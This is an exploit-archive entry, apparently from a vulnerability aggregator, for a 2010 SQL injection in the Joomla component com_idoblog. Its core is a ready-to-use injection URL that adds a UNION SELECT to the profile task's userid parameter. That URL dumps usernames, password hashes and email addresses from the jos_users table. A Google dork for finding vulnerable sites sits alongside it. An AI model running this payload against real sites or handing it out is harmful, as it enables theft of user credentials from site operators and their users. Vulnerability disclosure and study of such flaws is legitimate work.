Joomla! Component com_idoblog - SQL Injection

🗓️ 25 Dec 2010 00:00:00Reported by NOCKAR1111Type

Joomla! Component com_idoblog - SQL Injection - Vulnerable to SQL injection via user profile tas

# Exploit Title: joomla com_idoblog /SQL injection Vulnerability
# Google Dork: inurl:"com_idoblog"
# Date: 25/12/2010
# Author: NOCKAR1111
# Location:Algeria
# AuthorEmail:[email protected]
# Language: php
# Tested on: windows xp sp3 en
# http://extensions.joomla.org/extensions/news-production/blog/9218

#Exploit:http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

____________________________________________
Greetz:Lagripe-dz,BrOx-Dz,Mr NoRvI,indoushka
and dz4all members

25 Dec 2010 00:00Current

7High risk

Vulners AI Score7